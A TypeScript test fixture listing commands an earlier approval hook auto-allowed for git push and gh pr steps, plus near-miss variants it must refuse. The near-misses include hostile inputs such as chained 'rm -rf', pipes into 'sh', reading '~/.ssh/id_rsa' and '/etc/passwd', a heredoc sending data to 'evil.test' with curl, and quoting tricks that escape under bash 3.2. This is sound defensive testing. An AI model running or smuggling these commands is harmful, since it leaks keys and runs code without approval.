// The two tables the hook is swept with: every command an earlier version
// let run without a prompt, and commands one step away from one. The hook
// must answer nothing or a refusal for all of them, alone or joined.

/** A pull request body as a heredoc. bash 3.2 runs what such a body holds. */
const HEREDOC_BODY = "\"$(cat <<'EOF'\n## Summary\n- don't chain; `git push` && $(rm -rf x) | $HOME \"quoted\"\nEOF\n)\"";
const LONGEST = `worktree-${"a".repeat(91)}`;

/** What the setting file of that version held with everything turned on. Nothing reads it now. */
export const OLD_SETTING_ON = { approvePushAndCreate: true, approveMerge: true };

/**
 * Every command an earlier version of the hook answered `allow` for, when
 * the project had turned that on. The hook must never answer so again.
 */
export const ONCE_ALLOWED: string[] = [
  "git push origin worktree-a",
  "git push -u origin worktree-rates-filter",
  "git push --set-upstream origin worktree-a.b_c-1",
  `git push origin ${LONGEST}`,
  "git  push \t origin   worktree-a ",
  "git push origin worktree-a 2>&1",
  "git push origin worktree-a | tail -2",
  "git push -u origin worktree-a 2>&1 | tail -n 5",
  "git push -u origin worktree-a 2>&1 | head -20",
  "gh pr create --head worktree-a",
  "gh pr create --head worktree-a --fill",
  "gh pr create --head worktree-a -f -d",
  "gh pr create --head worktree-a --title T --body B",
  'gh pr create --head worktree-a --title "fix: a thing (#12), it\'s done" --body \'no $expansion `here` \\n && ; | ! ~ * {a,b} #x =ls\'',
  "gh pr create --head worktree-a --title 'Add the price list!' --body '## Summary\n\n- one (link) and a ) \" ; echo no ; \"\n- two `echo no` $(echo no)\n\tindented\n'",
  'gh pr create --head worktree-a --title "feat: prices" --body "## Summary\n\n- it\'s here; a | b && c > d < e (f) [g] * ? ~ # % ^ = + @\n- done"',
  "gh pr create --head worktree-a --title '' --body \"\"",
  "gh pr create --head worktree-a --title 'non-breaking\u00a0space, line\u2028separator, caf\u00e9, \u{1F600}' --body 'x' 2>&1 | tail -3",
  'gh pr create -t "x" -b "two\nlines" -B main -H worktree-a --draft',
  "gh pr create --fill --base release/1.x --head worktree-a",
  "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567",
  "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge",
  "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -m",
  "gh pr merge 7 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --squash",
  "gh pr merge 7 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --rebase",
  "gh pr merge 7 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -s",
  "gh pr merge 7 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -r",
  'gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge --subject "docs: the week" --body \'as agreed\'',
  "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -t x -b 'why\n\nand how'",
  "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge 2>&1 | tail -2",
];

/** Commands one step away from one of those. */
export const NEAR_MISSES: [string, string][] = [
  // git push: more than one thing pushed, or something other than a plain push
  ["a second refspec", "git push origin worktree-a main"],
  ["--delete after the branch", "git push origin worktree-a --delete main"],
  ["--delete of the branch", "git push origin --delete worktree-a"],
  ["-d", "git push -d origin worktree-a"],
  ["--force-with-lease", "git push origin worktree-a --force-with-lease"],
  ["--force", "git push --force origin worktree-a"],
  ["-f", "git push -f origin worktree-a"],
  ["-f joined to -u", "git push -fu origin worktree-a"],
  ["a + refspec", "git push origin +worktree-a"],
  ["source:target", "git push origin worktree-a:main"],
  ["HEAD:target", "git push origin HEAD:worktree-a"],
  ["--mirror", "git push --mirror origin worktree-a"],
  ["--mirror in place of the branch", "git push origin --mirror"],
  ["--all", "git push --all origin"],
  ["--tags after the branch", "git push origin worktree-a --tags"],
  ["--tags before the remote", "git push --tags origin worktree-a"],
  ["--prune", "git push --prune origin worktree-a"],
  ["--no-verify", "git push --no-verify origin worktree-a"],
  ["--dry-run", "git push --dry-run origin worktree-a"],
  ["--push-option", "git push -u origin worktree-a --push-option=ci.skip"],
  ["--receive-pack", "git push --receive-pack=evil origin worktree-a"],
  ["--repo", "git push --repo=elsewhere origin worktree-a"],
  ["-u twice", "git push -u -u origin worktree-a"],
  ["-u after the remote", "git push origin -u worktree-a"],
  ["-u after the branch", "git push origin worktree-a -u"],
  ["--set-upstream with a value", "git push --set-upstream=origin worktree-a"],
  ["no branch", "git push origin"],
  ["no remote and no branch", "git push"],
  ["-u and no branch", "git push -u origin"],
  // git push: run somewhere else, or as someone else
  ["git -C", "git -C ../other push origin worktree-a"],
  ["git -c", "git -c push.default=matching push origin worktree-a"],
  ["a variable set in front", "GIT_SSH_COMMAND=evil git push origin worktree-a"],
  ["env in front", "env git push origin worktree-a"],
  ["a path to git", "/usr/bin/git push origin worktree-a"],
  ["a git beside the project", "./git push origin worktree-a"],
  ["another case", "Git push origin worktree-a"],
  ["another git command with the same words after it", "git fetch origin worktree-a"],
  ["git in quotes", "'git' push origin worktree-a"],
  // git push: to somewhere else
  ["another remote", "git push upstream worktree-a"],
  ["a URL for the remote", "git push https://example.test/x.git worktree-a"],
  ["an ssh address for the remote", "git push git@example.test:o/r.git worktree-a"],
  ["a folder for the remote", "git push ../other worktree-a"],
  ["this folder for the remote", "git push . worktree-a"],
  // git push: another branch
  ["main", "git push origin main"],
  ["a branch not named worktree-", "git push origin feature-x"],
  ["a branch that only contains worktree-", "git push origin my-worktree-a"],
  ["worktree- and no name", "git push origin worktree-"],
  ["worktree with no dash", "git push origin worktree"],
  ["a name that ends in a dot", "git push origin worktree-a."],
  ["a name with two dots", "git push origin worktree-a..b"],
  ["a name with a slash", "git push origin worktree-a/b"],
  ["a name that holds a flag", "git push origin worktree-a--force"],
  ["a name with ~", "git push origin worktree-a~1"],
  ["a name with ^", "git push origin worktree-a^"],
  ["a name with @{", "git push origin worktree-a@{u}"],
  ["a name longer than any real one", `git push origin ${LONGEST}a`],
  // git push: quoting, and anything the shell would expand
  ["two words in double quotes", 'git push origin "worktree-a main"'],
  ["an escaped space", "git push origin worktree-a\\ main"],
  ["the branch in double quotes", 'git push origin "worktree-a"'],
  ["the branch in single quotes", "git push origin 'worktree-a'"],
  ["a quote joined to a word", 'git push origin worktree-"a"'],
  ["a variable", "git push origin worktree-$NAME"],
  ["a variable for the remote", "git push $REMOTE worktree-a"],
  ["a glob", "git push origin worktree-*"],
  ["a brace list", "git push origin worktree-{a,b}"],
  ["a substitution", "git push origin $(echo worktree-a)"],
  ["backticks", "git push origin `echo worktree-a`"],
  ["a home folder", "git push ~/other worktree-a"],
  // anything after the step
  ["&& and another command", "git push origin worktree-a && rm -rf x"],
  ["; and another command", "git push origin worktree-a; ls"],
  [";", "git push origin worktree-a ;"],
  ["a new line and another command", "git push origin worktree-a\nls"],
  ["a new line", "git push origin worktree-a\n"],
  ["||", "git push origin worktree-a || true"],
  ["&", "git push origin worktree-a &"],
  ["a comment", "git push origin worktree-a # --force"],
  ["output to a file", "git push origin worktree-a > push.log"],
  ["errors to a file", "git push origin worktree-a 2> push.log"],
  ["2>&1 and then a file", "git push origin worktree-a 2>&1 > push.log"],
  ["2>&1 twice", "git push origin worktree-a 2>&1 2>&1"],
  ["2>&1 in place of the pipe", "git push origin worktree-a 2>&1 2>&1 tail -2"],
  [">&2", "git push origin worktree-a >&2"],
  ["a pipe into a shell", "git push origin worktree-a | sh"],
  ["a pipe into tee", "git push origin worktree-a | tee push.log"],
  ["a pipe into tail with a file", "git push origin worktree-a | tail -n 2 /etc/passwd"],
  ["a pipe into tail -f", "git push origin worktree-a | tail -f"],
  ["a pipe into tail with no count", "git push origin worktree-a | tail"],
  ["a pipe into tail --lines", "git push origin worktree-a | tail --lines=2"],
  ["two pipes", "git push origin worktree-a | tail -2 | sh"],
  ["a pipe, then another command", "git push origin worktree-a | tail -2; ls"],
  ["|&", "git push origin worktree-a |& tail -2"],
  ["the pipe before 2>&1", "git push origin worktree-a | tail -2 2>&1"],
  ["a pipe with no space", "git push origin worktree-a|tail -2"],
  ["a pipe into a shell with a count", "git push origin worktree-a | sh -2"],
  ["a count in quotes", "git push origin worktree-a | tail '-2'"],
  ["tail in quotes", "git push origin worktree-a | 'tail' -2"],
  ["a quoted pipe, which is a word for git", "git push origin worktree-a 2>&1 '|' tail -2"],
  // gh pr create: something expanded
  ["a substitution in the title", 'gh pr create --head worktree-a --title "$(whoami)" --body b'],
  ["a variable in the title", 'gh pr create --head worktree-a --title "$TITLE" --body b'],
  ["a bare variable for the title", "gh pr create --head worktree-a --title $TITLE"],
  ["backticks in the title", 'gh pr create --head worktree-a --title "a `id` b"'],
  ["a backslash in double quotes", 'gh pr create --head worktree-a --title "a \\"b\\""'],
  ["a substitution in the body", 'gh pr create --head worktree-a --title t --body "$(cat ~/.ssh/id_rsa)"'],
  ["the heredoc form, which bash 3.2 runs", `gh pr create --head worktree-a --title "feat: prices" --body ${HEREDOC_BODY}`],
  ["the heredoc form with an empty body", "gh pr create --head worktree-a --title x --body \"$(cat <<'BODY'\nBODY\n)\""],
  ["the heredoc form on a merge", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -t x -b \"$(cat <<'MSG'\nwhy\nMSG\n)\""],
  ["the heredoc whose body closes the substitution for bash 3.2", "gh pr create --head worktree-a --title \"a\" --body \"$(cat <<'EOF'\nsee (link) and a ) \" ; echo ESCAPED-1 ; \"\nit's `echo ESCAPED-2` $(echo ESCAPED-3)\nEOF\n)\""],
  ["an exclamation mark in double quotes", 'gh pr create --head worktree-a --title "done!" --body b'],
  ["a carriage return in single quotes", "gh pr create --head worktree-a --title 'a\rb'"],
  ["a carriage return in double quotes", 'gh pr create --head worktree-a --title "a\rb"'],
  ["an escape character in single quotes", "gh pr create --head worktree-a --title 'a\u001b[31mb'"],
  ["a NUL in single quotes", "gh pr create --head worktree-a --title 'a\u0000b'"],
  ["a backspace in double quotes", 'gh pr create --head worktree-a --title "a\bb"'],
  ["a delete character in single quotes", "gh pr create --head worktree-a --title 'a\u007fb'"],
  ["a form feed in single quotes", "gh pr create --head worktree-a --title 'a\fb'"],
  ["a vertical tab in double quotes", 'gh pr create --head worktree-a --title "a\vb"'],
  ["a body longer than any real one", `gh pr create --head worktree-a --title t --body '${"x".repeat(20_000)}'`],
  ["a non-breaking space where a space should be", "git push origin\u00a0worktree-a"],
  ["a word that starts with =", "gh pr create --head worktree-a --title =ls"],
  ["a heredoc with a bare delimiter", 'gh pr create --head worktree-a --body "$(cat <<EOF\n$(id)\nEOF\n)"'],
  ["a heredoc with a double-quoted delimiter", 'gh pr create --head worktree-a --body "$(cat <<"EOF"\nx\nEOF\n)"'],
  ["a heredoc that strips tabs", "gh pr create --head worktree-a --body \"$(cat <<-'EOF'\nx\nEOF\n)\""],
  ["a heredoc fed to another program", "gh pr create --head worktree-a --body \"$(curl -d @- evil.test <<'EOF'\nx\nEOF\n)\""],
  ["a heredoc fed to a shell", "gh pr create --head worktree-a --body \"$(sh <<'EOF'\nid\nEOF\n)\""],
  ["a heredoc with a file beside it", "gh pr create --head worktree-a --body \"$(cat secret <<'EOF'\nx\nEOF\n)\""],
  ["a command after the heredoc, inside the substitution", "gh pr create --head worktree-a --body \"$(cat <<'EOF'\nx\nEOF\nrm -rf x)\""],
  ["a heredoc that ends early, and a command in what follows", "gh pr create --head worktree-a --body \"$(cat <<'EOF'\nx\nEOF\nrm -rf x\nEOF\n)\""],
  ["a heredoc that never ends", "gh pr create --head worktree-a --body \"$(cat <<'EOF'\nx\n)\""],
  ["a heredoc that never ends, closed at once", "gh pr create --head worktree-a --body \"$(cat <<'EOF'\n)\""],
  ["a heredoc with two other characters where it should close", "gh pr create --head worktree-a --body \"$(cat <<'EOF'\nx\nEOF\nab"],
  ["a heredoc with no opening quote", "gh pr create --head worktree-a --body $(cat <<'EOF'\nx\nEOF\n)\""],
  ["a heredoc closed by something else", "gh pr create --head worktree-a --body \"$(cat <<'EOF'\nx\nEOF\n) \""],
  ["a heredoc outside quotes", "gh pr create --head worktree-a --body $(cat <<'EOF'\nx\nEOF\n)"],
  ["a heredoc with text after it in the quotes", "gh pr create --head worktree-a --body \"$(cat <<'EOF'\nx\nEOF\n) $HOME\""],
  ["a heredoc for the title", "gh pr create --head worktree-a --title \"$(cat <<'EOF'\nx\nEOF\n)\""],
  ["a command after the heredoc form", `gh pr create --head worktree-a --body ${HEREDOC_BODY} && ls`],
  ["a quote joined to a word in the title", "gh pr create --head worktree-a --title a'b'"],
  ["a word joined to a quote in the title", 'gh pr create --head worktree-a --title "a"b'],
  // gh pr create: a flag outside the short list
  ["--body-file", "gh pr create --head worktree-a --title t --body-file notes.md"],
  ["-F from standard input", "gh pr create --head worktree-a --title t -F -"],
  ["--template", "gh pr create --head worktree-a --template .env"],
  ["--repo", "gh pr create --head worktree-a --fill --repo other/project"],
  ["-R", "gh pr create --head worktree-a --fill -R other/project"],
  ["gh -R", "gh -R other/project pr create --head worktree-a --fill"],
  ["--web", "gh pr create --head worktree-a --web"],
  ["--editor", "gh pr create --head worktree-a --editor"],
  ["--reviewer", "gh pr create --head worktree-a --fill --reviewer someone"],
  ["--assignee", "gh pr create --head worktree-a --fill --assignee someone"],
  ["--label", "gh pr create --head worktree-a --fill --label urgent"],
  ["--fill-first", "gh pr create --head worktree-a --fill-first"],
  ["--dry-run", "gh pr create --head worktree-a --dry-run"],
  ["--recover", "gh pr create --head worktree-a --recover file.json"],
  ["--title with =", "gh pr create --head worktree-a --title=t"],
  ["--title twice", "gh pr create --head worktree-a --title a --title b"],
  ["--title and its short form", "gh pr create --head worktree-a -t a --title b"],
  ["--title with nothing after it", "gh pr create --head worktree-a --title"],
  ["a head branch that is not a work branch", "gh pr create --fill --head main"],
  ["a head in another fork", "gh pr create --fill --head someone:worktree-a"],
  ["a base in quotes", 'gh pr create --head worktree-a --fill --base "main"'],
  ["a base that is a flag", "gh pr create --head worktree-a --fill --base --web"],
  ["a base with two dots", "gh pr create --head worktree-a --fill --base main..x"],
  ["a word that is not a flag", "gh pr create --head worktree-a extra"],
  ["a word every object has", "gh pr create --head worktree-a constructor"],
  ["another word every object has", "gh pr create --head worktree-a toString"],
  ["a token set in front", "GH_TOKEN=abc gh pr create --head worktree-a --fill"],
  ["gh in quotes", '"gh" pr create --head worktree-a --fill'],
  ["pr in quotes", "gh 'pr' create --head worktree-a --fill"],
  ["a flag in quotes", "gh pr create --head worktree-a '--fill'"],
  ["output to a file", "gh pr create --head worktree-a --fill > out.txt"],
  ["no head", "gh pr create"],
  ["no head, with --fill", "gh pr create --fill"],
  ["no head, with a title and a body", "gh pr create --title T --body B"],
  ["a head named twice", "gh pr create --head worktree-a -H worktree-b"],
  ["a head longer than any real one", `gh pr create --head ${LONGEST}a`],
  // gh pr merge
  ["--admin", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge --admin"],
  ["--admin alone", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --admin"],
  ["--repo", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge --repo other/project"],
  ["-R", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -R other/project"],
  ["--auto", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge --auto"],
  ["--disable-auto", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --disable-auto"],
  ["--body-file", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge --body-file notes.md"],
  ["--match-head-commit", "gh pr merge 12 --match-head-commit abc123"],
  ["--author-email", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --author-email nobody"],
  ["no number", "gh pr merge --match-head-commit 0123456789abcdef0123456789abcdef01234567"],
  ["a flag and no number", "gh pr merge --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge"],
  ["the number after a flag", "gh pr merge --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge 12"],
  ["two numbers", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 13"],
  ["a branch in place of the number", "gh pr merge worktree-a --match-head-commit 0123456789abcdef0123456789abcdef01234567"],
  ["a URL in place of the number", "gh pr merge https://example.test/o/r/pull/12 --match-head-commit 0123456789abcdef0123456789abcdef01234567"],
  ["the number in quotes", 'gh pr merge "12" --match-head-commit 0123456789abcdef0123456789abcdef01234567'],
  ["zero", "gh pr merge 0 --match-head-commit 0123456789abcdef0123456789abcdef01234567"],
  ["a number with a zero in front", "gh pr merge 012 --match-head-commit 0123456789abcdef0123456789abcdef01234567"],
  ["a negative number", "gh pr merge -1 --match-head-commit 0123456789abcdef0123456789abcdef01234567"],
  ["two ways to merge", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge --squash"],
  ["one way to merge, twice", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -m --merge"],
  ["--delete-branch, which changes the checkout", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge --delete-branch"],
  ["-d", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -d"],
  ["no commit named", "gh pr merge 12 --merge"],
  ["no commit named and no flag", "gh pr merge 12"],
  ["a commit named twice", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --match-head-commit 0123456789abcdef0123456789abcdef01234567"],
  ["a commit in capitals", "gh pr merge 12 --match-head-commit 0123456789ABCDEF0123456789ABCDEF01234567"],
  ["a commit one digit short", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef0123456"],
  ["a commit one digit long", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef012345670"],
  ["a commit in quotes", "gh pr merge 12 --match-head-commit '0123456789abcdef0123456789abcdef01234567'"],
  ["a branch where the commit should be", "gh pr merge 12 --match-head-commit worktree-a"],
  ["HEAD where the commit should be", "gh pr merge 12 --match-head-commit HEAD"],
  ["short flags joined", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 -md"],
  ["--subject with nothing after it", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --subject"],
  ["a substitution in the subject", 'gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --subject "$(id)"'],
  ["a word every object has", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 hasOwnProperty"],
  ["a push joined to it", "gh pr merge 12 --match-head-commit 0123456789abcdef0123456789abcdef01234567 --merge && git push origin worktree-a"],
  // other steps
  ["gh pr edit", "gh pr edit 12 --title t"],
  ["gh pr close", "gh pr close 12"],
  ["gh pr comment", "gh pr comment 12 --body hi"],
  ["gh pr merge spelled longer", "gh pr merged 12"],
  ["gh workflow run", "gh workflow run ci.yml"],
  ["a gh api write", "gh api repos/o/r/git/refs -X POST"],
  ["gh issue create", "gh issue create --head worktree-a --title t"],
  ["a local command", "git commit -m wip"],
  ["another program", "glab mr create"],
  ["nothing", ""],
  ["gh alone", "gh pr"],
];
